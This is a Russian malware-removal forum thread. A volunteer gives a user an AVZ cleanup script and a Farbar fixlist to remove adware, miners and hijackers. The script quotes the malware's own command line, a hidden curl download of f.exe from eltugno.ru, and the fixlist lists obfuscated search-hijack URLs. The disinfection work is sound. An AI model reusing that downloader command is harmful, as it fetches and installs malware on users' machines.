После установки драйверов скачалось что-то еще. После этого у компьютера понизилась производительность раза в 2. Стал чаще лагать и т.д. Помогите избавится от них пожалуйста!
После установки драйверов скачалось что-то еще. После этого у компьютера понизилась производительность раза в 2. Стал чаще лагать и т.д. Помогите избавится от них пожалуйста!
Уважаемый(ая) Foxwill, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
![]()
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Выполните скрипт в AVZ:Компьютер перезагрузится.Код:begin TerminateProcessByName('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp'); StopService('0177541477233912mcinstcleanup'); StopService('swsedrvr_vw_1_10_0_25'); QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', ''); QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', ''); QuarantineFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', ''); QuarantineFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', ''); QuarantineFile('C:\Program Files (x86)\amuleC\ed2k.exe', ''); QuarantineFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', ''); QuarantineFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', ''); QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', ''); QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', ''); QuarantineFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', ''); QuarantineFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', ''); QuarantineFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', ''); QuarantineFile('C:\Program Files\ByteFence\ByteFence.exe', ''); QuarantineFile('c:\program files\bytefence\ByteFenceService.exe', ''); QuarantineFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', ''); QuarantineFile('C:\Program Files\UBar\UbarDriver.sys', ''); QuarantineFile('C:\Program Files\UBar\UbarService.exe', ''); QuarantineFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', ''); QuarantineFile('C:\ProgramData\Doubleing\Doubleing.exe', ''); QuarantineFile('C:\ProgramData\hdtask\hdtask.exe', ''); QuarantineFile('C:\ProgramData\Logic Handler\set.exe', ''); QuarantineFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', ''); QuarantineFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', ''); QuarantineFile('C:\WINDOWS\Microsoft\svchost.exe', ''); QuarantineFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', ''); QuarantineFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', ''); QuarantineFile('C:\WINDOWS\TEMP\017754~1.EXE', ''); QuarantineFileF('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\program files (x86)\amulec', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\programdata\doubleing', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\users\огурцов\appdata\local\hostinstaller', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 , 0); QuarantineFileF('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', ''); DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', ''); DeleteFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', ''); DeleteFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', ''); DeleteFile('C:\Program Files (x86)\amuleC\ed2k.exe', ''); DeleteFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', '32'); DeleteFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', ''); DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', ''); DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', ''); DeleteFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', ''); DeleteFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', ''); DeleteFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', '32'); DeleteFile('C:\Program Files\ByteFence\ByteFence.exe', ''); DeleteFile('c:\program files\bytefence\ByteFenceService.exe', ''); DeleteFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', ''); DeleteFile('C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll', '32'); DeleteFile('C:\Program Files\UBar\UbarDriver.sys', ''); DeleteFile('C:\Program Files\UBar\UbarService.exe', ''); DeleteFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', '32'); DeleteFile('C:\ProgramData\Doubleing\Doubleing.exe', ''); DeleteFile('C:\ProgramData\hdtask\hdtask.exe', '32'); DeleteFile('C:\ProgramData\Logic Handler\set.exe', ''); DeleteFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '64'); DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '32'); DeleteFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', '32'); DeleteFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Огурцов\AppData\Roaming\curl\curl.exe"', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '32'); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '32'); DeleteFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', ''); DeleteFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', ''); DeleteFile('C:\WINDOWS\Microsoft\svchost.exe', ''); DeleteFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', ''); DeleteFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', ''); DeleteFile('C:\WINDOWS\TEMP\017754~1.EXE', ''); DeleteFile('http:\eltugno.ru\f.exe', ''); ExecuteFile('schtasks.exe', '/delete /TN "ByteFence" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "DuckGo Task" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "LumProcess" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\MailruSetup" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\Manager" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\ReportSender" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "One System Care Monitor" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "ScriptWriter" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Soft installer" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "WindowsUpdater" /F', 0, 15000, true); DeleteService('0177541477233912mcinstcleanup'); DeleteService('ancykxdb'); DeleteService('anqnvoio'); DeleteService('apswdtxg'); DeleteService('aywzshgp'); DeleteService('backlh'); DeleteService('bbbudopp'); DeleteService('bcouyzjs'); DeleteService('bjsehlvo'); DeleteService('bozmbqij'); DeleteService('bpifnwbn'); DeleteService('bqgiiaih'); DeleteService('bycvkxab'); DeleteService('ByteFenceService'); DeleteService('chaeuizt'); DeleteService('cjsggimu'); DeleteService('coessqjo'); DeleteService('cvafeojm'); DeleteService('cytilizo'); DeleteService('czasafsn'); DeleteService('dbx'); DeleteService('dennzevk'); DeleteService('dkomupml'); DeleteService('Doubleing'); DeleteService('ebteumgs'); DeleteService('eclpjzhy'); DeleteService('ed2kidle'); DeleteService('eijcgadq'); DeleteService('ejdhbujs'); DeleteService('ejqmezgn'); DeleteService('exzpnbkc'); DeleteService('fikhcuvx'); DeleteService('flctpmkv'); DeleteService('fpozvpip'); DeleteService('fsppkmsm'); DeleteService('ftrievld'); DeleteService('ggbczjib'); DeleteService('grogkvul'); DeleteService('gypnyrpk'); DeleteService('hnybidnj'); DeleteService('hurqvgof'); DeleteService('hvmspoqn'); DeleteService('ilwmvcxg'); DeleteService('jlddrvts'); DeleteService('jqtdndvb'); DeleteService('jvtgngyq'); DeleteService('jwxbxmze'); DeleteService('khxlthud'); DeleteService('kvlyyfev'); DeleteService('lgsvhrfs'); DeleteService('LiveUpdateSvc'); DeleteService('lonekmwa'); DeleteService('lpodhrht'); DeleteService('lxhhogbx'); DeleteService('makmjdwm'); DeleteService('McComponentHostService'); DeleteService('mcqtjynl'); DeleteService('muiikavs'); DeleteService('naylrybp'); DeleteService('Nettrans'); DeleteService('nfhcuzwm'); DeleteService('nlwxeqhr'); DeleteService('nomsbdff'); DeleteService('nrbvdmvg'); DeleteService('nugobuse'); DeleteService('nvnprykv'); DeleteService('obzzxyvx'); DeleteService('ohxgsnag'); DeleteService('okiuazqx'); DeleteService('okvgqsba'); DeleteService('paplbcjx'); DeleteService('pejcktpo'); DeleteService('pkfahwgk'); DeleteService('pmpqtklp'); DeleteService('qfybyovi'); DeleteService('QMUdisk'); DeleteService('qnabfcdz'); DeleteService('qnyphnvj'); DeleteService('qprkqvxc'); DeleteService('qtvoxmki'); DeleteService('qxkidsjg'); DeleteService('rlzazkuc'); DeleteService('rngeiytu'); DeleteService('rtbhagez'); DeleteService('rtop'); DeleteService('rwzavqul'); DeleteService('ryshjglb'); DeleteService('snfbvbhr'); DeleteService('softaal'); DeleteService('sokylole'); DeleteService('SPS'); DeleteService('srbqkcgi'); DeleteService('SvcHost Service Host'); DeleteService('swsedrvr_vw_1_10_0_25'); DeleteService('tcuuadtw'); DeleteService('tdczeevt'); DeleteService('tddgzhju'); DeleteService('tglssguf'); DeleteService('tgrnveup'); DeleteService('thkzcpun'); DeleteService('tkskrchq'); DeleteService('TrueKeyScheduler'); DeleteService('TrueKeyServiceHelper'); DeleteService('txvipmsx'); DeleteService('tysjnfcx'); DeleteService('UbarCalloutDriver'); DeleteService('UbarPolicyProvider'); DeleteService('ufghthyv'); DeleteService('ujbugeqa'); DeleteService('umxkcunc'); DeleteService('uotgmlmb'); DeleteService('Updater.Mail.Ru'); DeleteService('UvConverter'); DeleteService('uxbsnitn'); DeleteService('uxgtprhf'); DeleteService('uzcxzozd'); DeleteService('WeatherChiknSrvr'); DeleteService('wfcgtqki'); DeleteService('wifpmdvy'); DeleteService('wssxrmyk'); DeleteService('wucotusy'); DeleteService('xdjbpzhr'); DeleteService('xdrveulz'); DeleteService('yiamwbab'); DeleteService('yrnymepm'); DeleteService('ytwykeaw'); DeleteService('zalvstec'); DeleteService('zazbfhvj'); DeleteFileMask('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*', true); DeleteFileMask('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*', true); DeleteFileMask('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*', true); DeleteFileMask('c:\program files (x86)\amulec', '*', true); DeleteFileMask('c:\program files (x86)\iconrunner', '*', true); DeleteFileMask('c:\program files (x86)\onesystemcare', '*', true); DeleteFileMask('c:\program files (x86)\tencent', '*', true); DeleteFileMask('c:\program files (x86)\weatherchickn', '*', true); DeleteFileMask('c:\program files (x86)\youtube adblock', '*', true); DeleteFileMask('c:\program files\7q9q65ls95', '*', true); DeleteFileMask('c:\program files\bytefence', '*', true); DeleteFileMask('c:\program files\ubar', '*', true); DeleteFileMask('c:\program files\uyv96czo7j', '*', true); DeleteFileMask('c:\programdata\doubleing', '*', true); DeleteFileMask('c:\programdata\hdtask', '*', true); DeleteFileMask('c:\programdata\logic handler', '*', true); DeleteFileMask('c:\programdata\networkpacketmanitor', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\duckgo', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\hostinstaller', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\lumsystem', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\mailrusetup', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\scriptwriter', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\yc', '*', true); DeleteFileMask('c:\users\огурцов\appdata\locallow\searchgo', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\curl', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\currencyconvertor', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\windowsupdater', '*', true); DeleteFileMask('c:\users\огурцов\reportsender', '*', true); DeleteDirectory('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f'); DeleteDirectory('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f'); DeleteDirectory('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f'); DeleteDirectory('c:\program files (x86)\amulec'); DeleteDirectory('c:\program files (x86)\iconrunner'); DeleteDirectory('c:\program files (x86)\onesystemcare'); DeleteDirectory('c:\program files (x86)\tencent'); DeleteDirectory('c:\program files (x86)\weatherchickn'); DeleteDirectory('c:\program files (x86)\youtube adblock'); DeleteDirectory('c:\program files\7q9q65ls95'); DeleteDirectory('c:\program files\bytefence'); DeleteDirectory('c:\program files\ubar'); DeleteDirectory('c:\program files\uyv96czo7j'); DeleteDirectory('c:\programdata\doubleing'); DeleteDirectory('c:\programdata\hdtask'); DeleteDirectory('c:\programdata\logic handler'); DeleteDirectory('c:\programdata\networkpacketmanitor'); DeleteDirectory('c:\users\огурцов\appdata\local\duckgo'); DeleteDirectory('c:\users\огурцов\appdata\local\hostinstaller'); DeleteDirectory('c:\users\огурцов\appdata\local\lumsystem'); DeleteDirectory('c:\users\огурцов\appdata\local\mailrusetup'); DeleteDirectory('c:\users\огурцов\appdata\local\scriptwriter'); DeleteDirectory('c:\users\огурцов\appdata\local\yc'); DeleteDirectory('c:\users\огурцов\appdata\locallow\searchgo'); DeleteDirectory('c:\users\огурцов\appdata\roaming\curl'); DeleteDirectory('c:\users\огурцов\appdata\roaming\currencyconvertor'); DeleteDirectory('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj'); DeleteDirectory('c:\users\огурцов\appdata\roaming\windowsupdater'); DeleteDirectory('c:\users\огурцов\reportsender'); DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}'); DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}'); DelBHO('{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B}'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '6GMTU8RLCT'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'aebleyzkpy'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CurrencyConvertor'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'hdtask'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'K8J77YTFGJ'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'LumProcess'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'APSDaemon'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'IconRunner'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 2, true); RebootWindows(false); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
Спасибо большое, а что делать после того как я отправил архив с карантином? Ждать ответа?
Дочитать моё сообщение до конца. И Вы пока вместо карантина засунули 1) сам AutoLogger и 2) его логи.
WBR,
Vadim
Извините пожалуйста за невнимательность....
Вот файл
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!Код:CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\Run: [MailRuUpdater] => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [4100312 2017-11-24] (Mail.Ru) <==== ATTENTION AppInit_DLLs: C:\ProgramData\ApppaznoR\Quadtofind.dll => No File AppInit_DLLs-x32: C:\ProgramData\ApppaznoR\Stim-Lam.dll => No File ShellExecuteHooks: No Name - {83922134-9CE0-11E6-9D68-64006A5CFC23} - C:\Users\Огурцов\AppData\Roaming\Mdolybuers\Huqoent.dll -> No File <==== ATTENTION ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.376\SSScheduler.exe (No File) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Zaxar Games Browser.lnk [2017-11-02] <==== ATTENTION ShortcutTarget: Zaxar Games Browser.lnk -> C:\Program Files (x86)\Zaxar\ZaxarLoader.exe (Zaxar LTD) <==== ATTENTION ShortcutTarget: ProfitTaskMonitor.lnk -> C:\Program Files (x86)\ProfitTask\ProfitTaskMonitor.exe (No File) GroupPolicy: Restriction - Chrome <==== ATTENTION GroupPolicy\User: Restriction - Chrome <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms} HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616 HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3D} URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q= SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B1B60E205-BA95-469A-87F0-C2C71B3A6798%7D&gp=832418 SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms} BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll => No File BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\6IrSQWjT.dll => No File BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => No File BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Огурцов\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2017-11-26] (Mail.Ru) BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File Toolbar: 